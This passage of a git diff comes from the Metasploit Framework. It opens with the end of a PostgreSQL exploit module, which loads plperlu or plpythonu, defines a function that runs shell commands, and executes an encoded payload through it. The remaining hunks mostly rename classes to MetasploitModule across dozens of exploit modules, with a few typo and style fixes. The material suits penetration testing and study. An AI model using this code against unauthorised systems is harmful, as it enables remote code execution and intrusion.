exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')" + select_query = postgres_query(query) + + case select_query.keys[0] + when :conn_error + print_error "#{peer} - Connection error" + return false + when :sql_error + print_error "#{peer} - Exploit failed" + return false + when :complete + print_good "#{peer} - Exploit successful" + return true + else + print_error "#{peer} - Unknown" + return false + end + end + + def create_function?(language, func_name) + load_func = '' + + case language + when 'perl' + query = "CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" + query << "`$_[0]`;" + query << "$$ LANGUAGE pl#{language}u" + load_func = postgres_query(query) + when /^python(?:2|3)?/i + query = "CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" + query << "import subprocess, shlex\rsubprocess.check_output(shlex.split(c))\r" + query << "$$ LANGUAGE pl#{language}u" + load_func = postgres_query(query) + end + + case load_func.keys[0] + when :conn_error + print_error "#{peer} - Connection error" + return false + when :sql_error + print_error "#{peer} Exploit failed" + return false + when :complete + print_good "#{peer} - Loaded UDF (exec_#{func_name})" + return true + else + print_error "#{peer} - Unknown" + return false + end + end + + def load_procedural_language(language, extension) + query = "CREATE #{extension} pl#{language}u" + load_language = postgres_query(query) + return :loaded unless load_language.keys[0] == :sql_error + + match_exists = load_language[:sql_error].match(/(?:(extension|language) "pl#{language}u" already exists)/m) + return :exists if match_exists + + match_error = load_language[:sql_error].match(/(?:could not (?:open extension control|access) file|unsupported language)/m) + return :not_exists if match_error + end + + def do_login(user, pass, database) + begin + password = pass || postgres_password + result = postgres_fingerprint( + db: database, + username: user, + password: password + ) + + return result[:auth] if result[:auth] + print_status "#{peer} - Login failed" + return :noauth + + rescue Rex::ConnectionError + return :noconn + end + end + + def exploit + return unless vuln_version? + return unless login_success? + + languages = %w(perl python python2 python3) + languages.each do |language| + next unless load_extension?(language) + func_name = Rex::Text.rand_text_alpha(10) + next unless create_function?(language, func_name) + if exec_function?(func_name) + print_warning "Please clear extension [#{language}]: function [#{func_name}] manually" + break + end + end + postgres_logout if @postgres_conn + end +end diff --git a/modules/exploits/multi/realserver/describe.rb b/modules/exploits/multi/realserver/describe.rb index c6134b819a..5cb8006f8e 100644 --- a/modules/exploits/multi/realserver/describe.rb +++ b/modules/exploits/multi/realserver/describe.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/http/client' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/samba/nttrans.rb b/modules/exploits/multi/samba/nttrans.rb index 6f1f3652da..55bce31106 100644 --- a/modules/exploits/multi/samba/nttrans.rb +++ b/modules/exploits/multi/samba/nttrans.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/multi/samba/usermap_script.rb b/modules/exploits/multi/samba/usermap_script.rb index 24a37cc018..273535b2d3 100644 --- a/modules/exploits/multi/samba/usermap_script.rb +++ b/modules/exploits/multi/samba/usermap_script.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb index da27883df6..4143c99639 100644 --- a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb +++ b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /gSOAP\/2.7/ ] } @@ -77,7 +77,7 @@ class Metasploit4 < Msf::Exploit::Remote ], self.class) register_advanced_options( [ - OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', '7500']), + OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', 7500]), ], self.class) register_autofilter_ports([ 50013 ]) end diff --git a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb index 5f19e6518f..29b4f79091 100644 --- a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb +++ b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb index 3317ebcd9a..0b7ec86a63 100644 --- a/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb +++ b/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index ffeb54e5a4..804b286342 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index 51a57cbc44..aa63a817f5 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/svn/svnserve_date.rb b/modules/exploits/multi/svn/svnserve_date.rb index 7f5a0f9234..db88821c4f 100644 --- a/modules/exploits/multi/svn/svnserve_date.rb +++ b/modules/exploits/multi/svn/svnserve_date.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/http/client' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Brute diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index d7b0a59908..668405d446 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking def initialize(info = {}) diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb index b22a3d9646..b34c130d95 100644 --- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb +++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/rfb' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking WINDOWS_KEY = "\xff\xeb" diff --git a/modules/exploits/multi/vpn/tincd_bof.rb b/modules/exploits/multi/vpn/tincd_bof.rb index d391ce8da5..e9528b6b5b 100644 --- a/modules/exploits/multi/vpn/tincd_bof.rb +++ b/modules/exploits/multi/vpn/tincd_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'securerandom' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::EXE diff --git a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb index 786a20d57a..35ce7f691f 100644 --- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb +++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb @@ -6,7 +6,7 @@ require 'timeout' require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/netware/smb/lsass_cifs.rb b/modules/exploits/netware/smb/lsass_cifs.rb index 04c141d2a7..6693f0923b 100644 --- a/modules/exploits/netware/smb/lsass_cifs.rb +++ b/modules/exploits/netware/smb/lsass_cifs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/netware/sunrpc/pkernel_callit.rb b/modules/exploits/netware/sunrpc/pkernel_callit.rb index 0ab1da752a..51a3178859 100644 --- a/modules/exploits/netware/sunrpc/pkernel_callit.rb +++ b/modules/exploits/netware/sunrpc/pkernel_callit.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/osx/afp/loginext.rb b/modules/exploits/osx/afp/loginext.rb index f3ec48b721..a79cdfa897 100644 --- a/modules/exploits/osx/afp/loginext.rb +++ b/modules/exploits/osx/afp/loginext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/osx/arkeia/type77.rb b/modules/exploits/osx/arkeia/type77.rb index 45f1f5cd58..175fc3b918 100644 --- a/modules/exploits/osx/arkeia/type77.rb +++ b/modules/exploits/osx/arkeia/type77.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Arkeia diff --git a/modules/exploits/osx/browser/mozilla_mchannel.rb b/modules/exploits/osx/browser/mozilla_mchannel.rb index c7331b84ea..870e5fdfe2 100644 --- a/modules/exploits/osx/browser/mozilla_mchannel.rb +++ b/modules/exploits/osx/browser/mozilla_mchannel.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb index e00fd67998..d799eff564 100644 --- a/modules/exploits/osx/browser/safari_file_policy.rb +++ b/modules/exploits/osx/browser/safari_file_policy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/service_manager' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::FtpServer @@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote # msf/core/exploit/http/server.rb # def start_http(opts={}) - # Ensture all dependencies are present before initializing HTTP + # Ensure all dependencies are present before initializing HTTP use_zlib comm = datastore['ListenerComm'] @@ -255,7 +255,7 @@ class Metasploit3 < Msf::Exploit::Remote # set. # def use_zlib - if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true) + if !Rex::Text.zlib_present? && datastore['HTTP::compression'] fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!") end end diff --git a/modules/exploits/osx/browser/safari_metadata_archive.rb b/modules/exploits/osx/browser/safari_metadata_archive.rb index 27f17742a8..0c1d0842ce 100644 --- a/modules/exploits/osx/browser/safari_metadata_archive.rb +++ b/modules/exploits/osx/browser/safari_metadata_archive.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb b/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb index 3ba0b94a96..642b354d39 100644 --- a/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb +++ b/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb index b3f464b21a..8af9d76beb 100644 --- a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb +++ b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/browser/software_update.rb b/modules/exploits/osx/browser/software_update.rb index d360a35626..d4db34dba8 100644 --- a/modules/exploits/osx/browser/software_update.rb +++ b/modules/exploits/osx/browser/software_update.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/osx/email/mailapp_image_exec.rb b/modules/exploits/osx/email/mailapp_image_exec.rb index fe08b1e373..d98f9e22b3 100644 --- a/modules/exploits/osx/email/mailapp_image_exec.rb +++ b/modules/exploits/osx/email/mailapp_image_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/osx/ftp/webstar_ftp_user.rb b/modules/exploits/osx/ftp/webstar_ftp_user.rb index c61f1ceb23..651d321fc0 100644 --- a/modules/exploits/osx/ftp/webstar_ftp_user.rb +++ b/modules/exploits/osx/ftp/webstar_ftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/osx/http/evocam_webserver.rb b/modules/exploits/osx/http/evocam_webserver.rb index 2e4a586b97..26e58fd9ce 100644 --- a/modules/exploits/osx/http/evocam_webserver.rb +++ b/modules/exploits/osx/http/evocam_webserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/osx/local/dyld_print_to_file_root.rb b/modules/exploits/osx/local/dyld_print_to_file_root.rb index 28008e88b5..1061094e07 100644 --- a/modules/exploits/osx/local/dyld_print_to_file_root.rb +++ b/modules/exploits/osx/local/dyld_print_to_file_root.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking diff --git a/modules/exploits/osx/local/iokit_keyboard_root.rb b/modules/exploits/osx/local/iokit_keyboard_root.rb index e0b2c5f914..6c3a95d1b3 100644 --- a/modules/exploits/osx/local/iokit_keyboard_root.rb +++ b/modules/exploits/osx/local/iokit_keyboard_root.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking # Can cause kernel crash include Msf::Post::File diff --git a/modules/exploits/osx/local/nfs_mount_root.rb b/modules/exploits/osx/local/nfs_mount_root.rb index c4683889ab..42b4c462cc 100644 --- a/modules/exploits/osx/local/nfs_mount_root.rb +++ b/modules/exploits/osx/local/nfs_mount_root.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/osx/local/persistence.rb b/modules/exploits/osx/local/persistence.rb index 260632a90d..33de13001d 100644 --- a/modules/exploits/osx/local/persistence.rb +++ b/modules/exploits/osx/local/persistence.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'shellwords' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common diff --git a/modules/exploits/osx/local/rootpipe.rb b/modules/exploits/osx/local/rootpipe.rb index f22d6cb6a2..b438b4513c 100644 --- a/modules/exploits/osx/local/rootpipe.rb +++ b/modules/exploits/osx/local/rootpipe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking diff --git a/modules/exploits/osx/local/rootpipe_entitlements.rb b/modules/exploits/osx/local/rootpipe_entitlements.rb index 0a031f7a11..32ec381c51 100644 --- a/modules/exploits/osx/local/rootpipe_entitlements.rb +++ b/modules/exploits/osx/local/rootpipe_entitlements.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking diff --git a/modules/exploits/osx/local/rsh_libmalloc.rb b/modules/exploits/osx/local/rsh_libmalloc.rb index 97f9ae28dc..552003fd13 100644 --- a/modules/exploits/osx/local/rsh_libmalloc.rb +++ b/modules/exploits/osx/local/rsh_libmalloc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb index c77d4a4a2a..d4969cd478 100644 --- a/modules/exploits/osx/local/setuid_tunnelblick.rb +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb index 019a6bb019..dddb7b82a0 100644 --- a/modules/exploits/osx/local/setuid_viscosity.rb +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb index fe54af173c..018af4fcbe 100644 --- a/modules/exploits/osx/local/sudo_password_bypass.rb +++ b/modules/exploits/osx/local/sudo_password_bypass.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'shellwords' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local # ManualRanking because it's going to modify system time # Even when it will try to restore things, user should use diff --git a/modules/exploits/osx/local/tpwn.rb b/modules/exploits/osx/local/tpwn.rb index bfd0864d61..fddd890501 100644 --- a/modules/exploits/osx/local/tpwn.rb +++ b/modules/exploits/osx/local/tpwn.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking diff --git a/modules/exploits/osx/local/vmware_bash_function_root.rb b/modules/exploits/osx/local/vmware_bash_function_root.rb index ff20c7fe02..25410875e1 100644 --- a/modules/exploits/osx/local/vmware_bash_function_root.rb +++ b/modules/exploits/osx/local/vmware_bash_function_root.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/osx/mdns/upnp_location.rb b/modules/exploits/osx/mdns/upnp_location.rb index 3d32b05a7c..99667e4a44 100644 --- a/modules/exploits/osx/mdns/upnp_location.rb +++ b/modules/exploits/osx/mdns/upnp_location.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/osx/misc/ufo_ai.rb b/modules/exploits/osx/misc/ufo_ai.rb index 82404e2244..35011f1d02 100644 --- a/modules/exploits/osx/misc/ufo_ai.rb +++ b/modules/exploits/osx/misc/ufo_ai.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb index e9e228911d..3dfedafd3d 100644 --- a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb +++ b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/osx/samba/lsa_transnames_heap.rb b/modules/exploits/osx/samba/lsa_transnames_heap.rb index 3eca9265e6..03bc2152dd 100644 --- a/modules/exploits/osx/samba/lsa_transnames_heap.rb +++ b/modules/exploits/osx/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/osx/samba/trans2open.rb b/modules/exploits/osx/samba/trans2open.rb index bcd15fbb39..7e0e123d0a 100644 --- a/modules/exploits/osx/samba/trans2open.rb +++ b/modules/exploits/osx/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/solaris/dtspcd/heap_noir.rb b/modules/exploits/solaris/dtspcd/heap_noir.rb index ecf0331613..f65d028141 100644 --- a/modules/exploits/solaris/dtspcd/heap_noir.rb +++ b/modules/exploits/solaris/dtspcd/heap_noir.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/solaris/lpd/sendmail_exec.rb b/modules/exploits/solaris/lpd/sendmail_exec.rb index f71bdad36d..d7739db4ca 100644 --- a/modules/exploits/solaris/lpd/sendmail_exec.rb +++ b/modules/exploits/solaris/lpd/sendmail_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/solaris/samba/lsa_transnames_heap.rb b/modules/exploits/solaris/samba/lsa_transnames_heap.rb index 4445b77033..09b25d9077 100644 --- a/modules/exploits/solaris/samba/lsa_transnames_heap.rb +++ b/modules/exploits/solaris/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/solaris/samba/trans2open.rb b/modules/exploits/solaris/samba/trans2open.rb index 926c665dce..3623fcbd90 100644 --- a/modules/exploits/solaris/samba/trans2open.rb +++ b/modules/exploits/solaris/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb index 0a6caf1ee7..9ebc7d42e6 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/solaris/sunrpc/sadmind_exec.rb b/modules/exploits/solaris/sunrpc/sadmind_exec.rb index 5326f8d851..3557828c07 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_exec.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb index 184c225c90..5053c21189 100644 --- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb +++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb index bafae78d1e..5fde51c927 100644 --- a/modules/exploits/solaris/telnet/fuser.rb +++ b/modules/exploits/solaris/telnet/fuser.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb index 36c43eb15d..6672291ed6 100644 --- a/modules/exploits/solaris/telnet/ttyprompt.rb +++ b/modules/exploits/solaris/telnet/ttyprompt.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/dhcp/bash_environment.rb b/modules/exploits/unix/dhcp/bash_environment.rb index e3e6f56fad..ee3447c380 100644 --- a/modules/exploits/unix/dhcp/bash_environment.rb +++ b/modules/exploits/unix/dhcp/bash_environment.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DHCPServer diff --git a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb index 71a4fd8416..588bab550e 100644 --- a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb +++ b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb index f35930adfb..8fabe4bf78 100644 --- a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb +++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.close - print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}") + print_status("Executing PHP payload #{target_uri.path}#{payload_name}") res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, payload_name), 'method' => 'GET', diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index ce6388be3e..49de9d25e1 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb index b5a5b70f1f..91eccda718 100644 --- a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb +++ b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/http/ctek_skyrouter.rb b/modules/exploits/unix/http/ctek_skyrouter.rb index ff6c6bb7a9..746a77a401 100644 --- a/modules/exploits/unix/http/ctek_skyrouter.rb +++ 